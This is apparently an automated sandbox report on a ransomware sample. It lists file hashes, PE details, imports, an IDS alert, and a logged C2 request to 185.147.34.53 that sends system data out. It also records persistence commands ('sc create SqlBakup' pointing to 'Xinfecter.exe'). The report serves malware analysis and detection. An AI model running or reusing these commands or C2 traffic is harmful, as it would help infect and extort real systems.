                                                                                                      SHA1:2D73B9559D5E9C9E4995EF6D10BC281E87E9FB30
                                                                                                      SHA-256:158C52C35C888ECE4ED2C1758C8631FF4A26CAA8CC270BA318E7ABD9511881A6
                                                                                                      SHA-512:5C622592D4269A792A5D6144B46269B2A8D8CD94446BD51324D5FB22FED973F7CED2468D75F7ABB00A89A2D027D4E11A41D29B96A749B327E43DA9896029B4CB
                                                                                                      Malicious:false
                                                                                                      Preview:"BiXS3FRoLe.exe","7364","Console","1","15'432 K"..

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.5880778432190095
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:BiXS3FRoLe.exe
                                                                                                      File size:1'257'984 bytes
                                                                                                      MD5:8f807535948b5e93317baf48a4d0e69d
                                                                                                      SHA1:9c3a19d95ebd7d43cc37437237fbc75ebd541bf0
                                                                                                      SHA256:1e89b482a11bdda467322cca6a8a06621fc834587bfeb682cda22ee93885fe84
                                                                                                      SHA512:b12cab19e0e4181164f88b8b64ee9e03bd01d7aaba500bdf86f886d0050bef1a3d420dd5d395ca60059e348324458e9f63a06ca9a9eb202d6302aae5b4e7c73a
                                                                                                      SSDEEP:24576:sA4Lon3mf91eozjjwgCT13ssRJRuTB4yWTrUa+9MoK2jzblKPBvoIGXw1:4LO01eoz7a1JRuTBYrMMajzblqBvoIG+
                                                                                                      TLSH:E845AE207542C132D56182F05D7CEB9AD0ADBD384F758ACBB3C86B2E4A315D25E36E63
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Jid.+.7.+.7.+.7,..7.+.7,..7++.7,..7.+.7,A.6.+.7,A.6.+.7,A.6.+.7.S.7.+.7.+.7A+.7.@.6.+.7.@.6.+.7.@.7.+.7.@.6.+.7Rich.+.7.......

                                                                                                      File Icon

                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x490f31
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows cui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x65D53BC5 [Tue Feb 20 23:54:45 2024 UTC]
                                                                                                      TLS Callbacks:0x490570
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:1
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:1
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:1
                                                                                                      Import Hash:f527e8080fac9432953c548a4f7317af

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      call 00007F922538E207h
                                                                                                      jmp 00007F922538D389h
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      cmp cl, 00000040h
                                                                                                      jnc 00007F922538D527h
                                                                                                      cmp cl, 00000020h
                                                                                                      jnc 00007F922538D518h
                                                                                                      shrd eax, edx, cl
                                                                                                      shr edx, cl
                                                                                                      ret
                                                                                                      mov eax, edx
                                                                                                      xor edx, edx
                                                                                                      and cl, 0000001Fh
                                                                                                      shr eax, cl
                                                                                                      ret
                                                                                                      xor eax, eax
                                                                                                      xor edx, edx
                                                                                                      ret
                                                                                                      int3
                                                                                                      push esi
                                                                                                      mov eax, dword ptr [esp+14h]
                                                                                                      or eax, eax
                                                                                                      jne 00007F922538D53Ah
                                                                                                      mov ecx, dword ptr [esp+10h]
                                                                                                      mov eax, dword ptr [esp+0Ch]
                                                                                                      xor edx, edx
                                                                                                      div ecx
                                                                                                      mov ebx, eax
                                                                                                      mov eax, dword ptr [esp+08h]
                                                                                                      div ecx
                                                                                                      mov esi, eax
                                                                                                      mov eax, ebx
                                                                                                      mul dword ptr [esp+10h]
                                                                                                      mov ecx, eax
                                                                                                      mov eax, esi
                                                                                                      mul dword ptr [esp+10h]
                                                                                                      add edx, ecx
                                                                                                      jmp 00007F922538D559h
                                                                                                      mov ecx, eax
                                                                                                      mov ebx, dword ptr [esp+10h]
                                                                                                      mov edx, dword ptr [esp+0Ch]
                                                                                                      mov eax, dword ptr [esp+08h]
                                                                                                      shr ecx, 1
                                                                                                      rcr ebx, 1
                                                                                                      shr edx, 1
                                                                                                      rcr eax, 1
                                                                                                      or ecx, ecx
                                                                                                      jne 00007F922538D506h
                                                                                                      div ebx
                                                                                                      mov esi, eax
                                                                                                      mul dword ptr [esp+14h]
                                                                                                      mov ecx, eax
                                                                                                      mov eax, dword ptr [esp+10h]
                                                                                                      mul esi
                                                                                                      add edx, ecx
                                                                                                      jc 00007F922538D520h
                                                                                                      cmp edx, dword ptr [esp+0Ch]
                                                                                                      jnbe 00007F922538D51Ah
                                                                                                      jc 00007F922538D521h
                                                                                                      cmp eax, dword ptr [esp+08h]
                                                                                                      jbe 00007F922538D51Bh
                                                                                                      dec esi
                                                                                                      sub eax, dword ptr [esp+10h]
                                                                                                      sbb edx, dword ptr [esp+14h]
                                                                                                      xor ebx, ebx
                                                                                                      sub eax, dword ptr [esp+08h]
                                                                                                      sbb edx, dword ptr [esp+0Ch]
                                                                                                      neg edx
                                                                                                      neg eax
                                                                                                      sbb edx, 00000000h
                                                                                                      mov ecx, edx
                                                                                                      mov edx, ebx
                                                                                                      mov ebx, ecx
                                                                                                      mov ecx, eax
                                                                                                      mov eax, esi
                                                                                                      pop esi
                                                                                                      retn 0010h
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x11d9cc0xb4.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1300000x1e0.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1310000xd728.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1056700x38.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x10574c0x18.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1056a80x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xe30000x328.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000xe12e60xe1400e0d74f80a28bb2849cb3625249eaaaddFalse0.459934924736404zlib compressed data6.644805642900756IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0xe30000x3bc100x3be00963bb6f93dc59e32ea462a0ad9c4cbb6False0.39376467901878914data5.005363006540915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x11f0000x107780x8200f70591f8b968a1166c678e28b557c9daFalse0.15655048076923078data4.832432461427509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rsrc0x1300000x1e00x200319e7ac1640c4d053129c81ac0038351False0.52734375data4.701503258251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x1310000xd7280xd8003849f621e39858240cd95052fca19b06False0.5704571759259259data6.576011148892834IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_MANIFEST0x1300600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllSleep, FormatMessageW, GetLastError, SetEvent, GetDiskFreeSpaceExW, GetCurrentThread, WaitForSingleObjectEx, CloseHandle, HeapAlloc, GetLogicalDriveStringsA, GetProcAddress, SetFilePointerEx, LocalFree, GetFileSize, GetProcessHeap, GlobalMemoryStatusEx, MultiByteToWideChar, CopyFileW, WideCharToMultiByte, GetConsoleWindow, FormatMessageA, CreateSemaphoreA, CreateEventA, lstrcmpW, SetConsoleTitleW, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetThreadTimes, WriteConsoleW, SetStdHandle, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetComputerNameExW, GetSystemDirectoryW, GetFileAttributesW, CreateFileW, LocalAlloc, FindClose, WaitForMultipleObjectsEx, SetFilePointer, SetErrorMode, GetModuleFileNameW, WriteFile, ReleaseSemaphore, GetCurrentProcess, FindNextFileW, HeapFree, FindFirstFileW, ReadFile, GetModuleHandleW, CreateDirectoryW, GetEnvironmentStringsW, GetOEMCP, IsValidCodePage, FindNextFileA, FindFirstFileExA, GetTimeZoneInformation, HeapSize, HeapReAlloc, ReadConsoleW, CreatePipe, GetExitCodeProcess, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetCommandLineW, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, EncodePointer, DecodePointer, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, DeleteFileW, GetFileAttributesExW, SetEndOfFile, DeviceIoControl, MoveFileExW, AreFileApisANSI, ResetEvent, OpenEventA, SetWaitableTimer, GetCurrentProcessId, ResumeThread, GetLogicalProcessorInformation, GetModuleHandleA, CreateWaitableTimerA, InitializeSListHead, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, SignalObjectAndWait, CreateThread, SetThreadPriority, GetThreadPriority, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, FreeLibrary, FreeLibraryAndExitThread, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, CreateTimerQueue, LoadLibraryW, WaitForSingleObject, RtlUnwind, RaiseException, ExitProcess, GetModuleHandleExW, CreateProcessA, ExitThread, GetModuleFileNameA, GetStdHandle, GetCommandLineA
                                                                                                      USER32.dllEnumWindows, GetWindowTextA, ShowWindow, GetWindowTextLengthA
                                                                                                      ADVAPI32.dllCryptGenRandom, CryptReleaseContext, CryptAcquireContextA, SetSecurityDescriptorDacl, AccessCheck, SetSecurityDescriptorOwner, AllocateAndInitializeSid, IsValidSecurityDescriptor, OpenProcessToken, FreeSid, InitializeSecurityDescriptor, InitializeAcl, DuplicateToken, GetLengthSid, GetUserNameW, AddAccessAllowedAce, OpenThreadToken, SetSecurityDescriptorGroup
                                                                                                      SHELL32.dllShellExecuteW
                                                                                                      WS2_32.dllhtons, recv, connect, socket, send, WSAStartup, closesocket, WSACleanup, gethostbyname
                                                                                                      SHLWAPI.dllPathIsNetworkPathA
                                                                                                      NETAPI32.dllNetUserEnum, DsRoleGetPrimaryDomainInformation, NetApiBufferFree
                                                                                                      WININET.dllHttpOpenRequestW, HttpSendRequestW, InternetOpenW, InternetReadFile, InternetConnectW

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-12-06T13:42:11.708896+01002045821ET MALWARE [ANY.RUN] RCRU64 Ransomware Variant CnC Activity1192.168.2.1049715185.147.34.533586TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 6, 2024 13:42:23.033804893 CET4970980192.168.2.10104.26.13.205
                                                                                                      Dec 6, 2024 13:42:23.153645039 CET8049709104.26.13.205192.168.2.10
                                                                                                      Dec 6, 2024 13:42:23.153726101 CET4970980192.168.2.10104.26.13.205
                                                                                                      Dec 6, 2024 13:42:23.153920889 CET4970980192.168.2.10104.26.13.205
                                                                                                      Dec 6, 2024 13:42:23.273821115 CET8049709104.26.13.205192.168.2.10
                                                                                                      Dec 6, 2024 13:42:24.255562067 CET8049709104.26.13.205192.168.2.10
                                                                                                      Dec 6, 2024 13:42:24.255754948 CET4970980192.168.2.10104.26.13.205
                                                                                                      Dec 6, 2024 13:42:24.265717983 CET497153586192.168.2.10185.147.34.53
                                                                                                      Dec 6, 2024 13:42:24.386933088 CET358649715185.147.34.53192.168.2.10
                                                                                                      Dec 6, 2024 13:42:24.387010098 CET497153586192.168.2.10185.147.34.53
                                                                                                      Dec 6, 2024 13:42:24.387089014 CET497153586192.168.2.10185.147.34.53
                                                                                                      Dec 6, 2024 13:42:24.507087946 CET358649715185.147.34.53192.168.2.10
                                                                                                      Dec 6, 2024 13:42:24.507106066 CET358649715185.147.34.53192.168.2.10

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 6, 2024 13:42:22.887763023 CET6094453192.168.2.101.1.1.1
                                                                                                      Dec 6, 2024 13:42:23.025604963 CET53609441.1.1.1192.168.2.10

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Dec 6, 2024 13:42:22.887763023 CET192.168.2.101.1.1.10x8b00Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Dec 6, 2024 13:42:23.025604963 CET1.1.1.1192.168.2.100x8b00No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                      Dec 6, 2024 13:42:23.025604963 CET1.1.1.1192.168.2.100x8b00No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                      Dec 6, 2024 13:42:23.025604963 CET1.1.1.1192.168.2.100x8b00No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • api.ipify.org
                                                                                                      • 185.147.34.53

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.1049709104.26.13.205807364C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 6, 2024 13:42:23.153920889 CET82OUTGET / HTTP/1.1
                                                                                                      Accept: text/*
                                                                                                      User-Agent: YourUserAgent
                                                                                                      Host: api.ipify.org
                                                                                                      Dec 6, 2024 13:42:24.255562067 CET429INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 06 Dec 2024 12:42:24 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      Content-Length: 12
                                                                                                      Connection: keep-alive
                                                                                                      Vary: Origin
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8edc5b0c8a4b4244-EWR
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1640&rtt_var=820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=82&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                                                                                      Data Ascii: 8.46.123.228


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.1049715185.147.34.5335867364C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 6, 2024 13:42:24.387089014 CET2116OUTGET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:42:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~L8aq7AthsgOC4cJv42nbpH3UXKqgFnpfIF2Mh/P93OgZkF3JPD5MmtdEB9fVNMwZNaSO/3She5MBu7aPiTlTr2f0h8Tby5EoEg6fH+I199CVCljV+q3qJlndcf7Qc0kpc+2y3oLE5MQimq+Sf6T4Sf6STfXjIiYXs9UejSYERe9ho6EoO5vZ9lqVAIjxir0zzTwlMBuiCCOLQKgMSKNQAuM2fcGfrSqnnm3gPaoVOBR/PHwB6eAARud748ct0eiTO01y+AMJtI29FqtGk0+k/Hii9CWn8qrY6CUWFZABgf5KOmsSq6wR87WUdb+aznRnLauO9YOFUY6U4pOgX8eWhczQtRa9JO3ew5Zag/CvoIJ98OGRGpkFtn7SaCg4DfI5O/fr5qDCAYePnjRJhH45ZUkA6wwt2d1R88d4k1h4uWGqB7zXu8Q1AQw70gqz7qyIcIKHSsfZc3IDiOUZkQIITDLVehvE24+9mM4BAPGd1Fdx+R8CfTIgd5lo03LOE460v3eJ7x23hr4tJjerTwWk4kYVe1qeoAOzv9dl0GZgzIAjS0UYxunSSCfEOXvn3u7RtP7/F9bk50RTc7msTK7yw7sC8fcXypL3pxeW/AgERAoIBAEySUw5HjWknEMGnG1ixYvGcEz6KwSQgRXCK5xLzDXPTLBa/gI1SnNYuDVqidl7MR918bHVZp/6KYNyPbB4bMcMCP7GwX2m5bf0MJ+YE2tdGGxXybo9SmWaCv4A9khMIPpnhk3MzJg9bBzj17yChsdDynZzjrWzeqmnNm5MKJItU4DoROjGTGPgzLm8bzHSWqmKtKOsf8XySDxmJtlDdXt7NUj67TFGhe [TRUNCATED]
                                                                                                      Host: 185.147.34.53
                                                                                                      Connection: close


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:07:42:14
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\BiXS3FRoLe.exe"
                                                                                                      Imagebase:0xa70000
                                                                                                      File size:1'257'984 bytes
                                                                                                      MD5 hash:8F807535948B5E93317BAF48A4D0E69D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:07:42:14
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:07:42:14
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:07:42:14
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:tasklist /v /fo csv
                                                                                                      Imagebase:0x460000
                                                                                                      File size:79'360 bytes
                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:5
                                                                                                      Start time:07:42:14
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:findstr /i "dcdcf"
                                                                                                      Imagebase:0x990000
                                                                                                      File size:29'696 bytes
                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:6
                                                                                                      Start time:07:42:14
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                      Imagebase:0x7ff7df220000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:7
                                                                                                      Start time:07:42:15
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\Sgrmuserer.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\Sgrmuserer.exe
                                                                                                      Imagebase:0x7ff749ad0000
                                                                                                      File size:329'504 bytes
                                                                                                      MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:8
                                                                                                      Start time:07:42:15
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                      Imagebase:0x7ff7df220000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:9
                                                                                                      Start time:07:42:15
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                      Imagebase:0x7ff7df220000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:10
                                                                                                      Start time:07:42:16
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                      Imagebase:0x7ff7df220000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:11
                                                                                                      Start time:07:42:16
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:12
                                                                                                      Start time:07:42:16
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
                                                                                                      Imagebase:0x730000
                                                                                                      File size:61'440 bytes
                                                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:13
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:14
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                                                                                      Imagebase:0x730000
                                                                                                      File size:61'440 bytes
                                                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:15
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:16
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                                      Wow64 process (32bit):true
